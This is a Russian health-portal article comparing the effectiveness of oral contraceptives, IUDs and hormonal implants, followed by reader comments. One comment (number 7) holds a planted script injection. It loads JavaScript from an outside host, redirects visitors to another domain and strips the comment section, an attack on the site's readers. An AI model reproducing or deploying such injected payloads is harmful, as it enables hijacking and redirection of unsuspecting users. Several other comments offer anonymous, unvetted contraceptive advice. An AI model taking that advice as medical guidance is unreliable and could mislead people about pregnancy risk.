Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Что лучше: оральные контр...  >>  Что лучше: оральные контрацептивы или спирали?
 
Обратная связь
 

Что лучше: оральные контрацептивы или спирали?

Размер шрифта
10 июля 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

У женщин, которые используют гормональные противозачаточные таблетки, риск незапланированной беременности в 20 раз выше, чем у женщин, использующих внутриматочные спирали или гормональные импланты

Незапланированная беременность

Ученые считают, что незапланированная беременность является важной проблемой современного здравоохранения – в результате она оказывает негативное влияние не только на здоровье женщины, но и на здоровье новорожденного.

Основной причиной низкой эффективности оральных контрацептивов по сравнению с внутриматочными спиралями и гормональными имплантами является человеческий фактор: женщины просто забывают пить таблетки. Использование других методов контрацепции позволяет устранить этот негативный момент и, тем самым, существенно снизить риск незапланированной беременности и рисков для здоровья матери и ребенка.

Методы контрацепции

  • Гормональный имплант представляет собой специальное устройство, которое помещают под кожу руки через небольшой разрез с использованием местной анестезии.

Имплант содержит гормон, который непрерывно выделяется в течение 3-5 лет и защищает женщину от нежелательной беременности. Гормон вызывает сгущение слизи в канале шейки матки, что мешает продвижению сперматозоидов, и воздействует на слизистую оболочку матки и маточных труб, что препятствует прикреплению оплодотворенной яйцеклетки.

  • Внутриматочная спираль представляет собой Т-образное устройство, которое вводят в полость матки на 3-4 день от начала менструации. Она препятствует продвижению сперматозоидов из влагалища в полость матки, уменьшает срок жизни яйцеклетки, а также не дает оплодотворенной яйцеклетке прикрепиться к стенке матки.

Внутриматочная спираль устанавливается на 3-5 лет и рекомендуется рожавшим женщинам. Установить или извлечь внутриматочную спираль может только врач.

  • Оральные контрацептивы – это таблетки, которые содержат гормоны. Они подавляют овуляцию, вызывают сгущение слизи в канале шейки матки, делают сперматозоиды менее подвижными и изменяют структуру слизистой оболочки матки таким образом, что оплодотворенная яйцеклетка не может к ней прикрепиться.

При правильном применении эффективность оральных контрацептивов составляет более 99%, но это в теории. На самом деле большинство женщин забывает принимать таблетки каждый день в одно и то же время, что существенно повышает риск незапланированной беременности.

Суть и результаты исследования

В исследовании приняли участие 7 486 женщин репродуктивного возраста, которые самостоятельно выбрали понравившийся метод контрацепции после консультации врача.

За три года наблюдения было зарегистрировано 334 случая незапланированной беременности, причем 133 случая – у женщин, которые использовали оральные контрацептивы, противозачаточные пластыри или вагинальные кольца, и только 21 случай – у женщин, которые использовали внутриматочные спирали или гормональные импланты.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

16 июля 2012 в 16:38

Цитировать   |   Пожаловаться

Название статьи обещает якобы ответить на вопрос: какой метод контрацепции эффективнее. А в тексте мы получаем ответ на вопрос: о каком методе контрацепции чаще должна думать и вспоминать принимающая. Это ведь же разные вещи. 

К тому же в России на сегодняшний день не зарегистрирован ни один противозачаточный имплант. А спирали нельзя ставить не рожавшим девушкам. (чем же им предохраняться?)  Также при установки спирали есть вероятность повреждения полости матки в силу физиологических особенностей строения организма девушки. Поэтому говорить о том, какой из озвученных методов лучше - в корень не верно. Методы разные, у каждого есть свои плюсы и минусы.  Статистика незапланированных беременностей, скорее, говорит, о культуре и ответственности использования современных методов контрацепции. женской половиной общества. 

Гость 16 июля 2012 в 16:38
А в тексте мы получаем ответ на вопрос: о каком методе контрацепции чаще должна думать и вспоминать принимающая. Это ведь же разные вещи. 
 Метод гормональной контрацепции требует дополнительных ресурсов - постоянного внимания со стороны женщин. Именно пр этой причине он оказался (в приведенном исследовании) менее эффективным. Эффективность оценивается по совокупности результата и затрат на этот результат.

3 - Гость

09 апреля 2014 в 22:19

Цитировать   |   Пожаловаться

Я думаю нельзя дать для всех универсального ответа на этот вопрос, каждый выбирает то, что подходит именно ему. Я уже давно пользуюсь свечами они не пенятся и их удобно использовать. 

4 - Гость

18 августа 2014 в 22:15

Комментарий удален за нарушение Правил общения

5 - Гость

02 октября 2014 в 11:01

Цитировать   |   Пожаловаться

Здравствуйте. Подскажите, пожалуйста, как мне быть? Стараюсь предохраняться таблетированными препаратами. Перепробовала  несколько наименований противозачаточных таблеток ( около пяти), каждые по 1 месяцу,но во всех случаях появляется кровотечение в середине приема таблеток. Сейчас принимаю РЕГУЛОН ( четвертый месяц) можно сказать, что менструация начинается на 16 день приема таблеток ( но ведь так же не должно быть) продолжается 5-6 дней. А во время 7 дневного перерыва ничего нет. Спираль не подходит. Что делать, может есть какие-то противозач. таблетки , подходящие в моем случае?Подскажите.

6 - Гость

20 мая 2015 в 18:27

Цитировать   |   Пожаловаться

Мне было плохо из-за приема ОК, по совету врача перешла на свечи, ими очень довольна.

7 - zzzzzz

30 июня 2015 в 23:39

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

8 - Гость

05 ноября 2015 в 17:29

Цитировать   |   Пожаловаться

Гость 20 мая 2015 в 18:27
Мне было плохо из-за приема ОК, по совету врача перешла на свечи, ими очень довольна.
 Лично мне далеко не все свечи подходят, я предпочитаю пользоваться Ноноксинолом, они наиболее комфортные в использовании и очень надежные.

Статьи

       
Семь причин использовать пероральные контрацептивы   Как сохранить красоту и здоровье после 30?   Все что вы хотели знать о презервативах   Мужская гормональная контрацепция  
10 июля 2012Гормон, отвечающий за материнские чувства, способен бороться с лишним весом 09 июля 2012Ученые выяснили, какой вид контрацепции надежнее!
 
17 октября 2012Гормон оргазма поможет прочесть мысли 30 января 2012УЗИ – новый метод контрацепции?
 

Слайдшоу

1
Правильно ли вы предохраняетесь?
Вы и не знали, на что способны противозачаточные!
Методы контрацепции

Тесты

1
Как подобрать контрацептивы?
Насколько у вас велик риск заболеть ВИЧ?
Есть ли у вас варикозное расширение вен?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.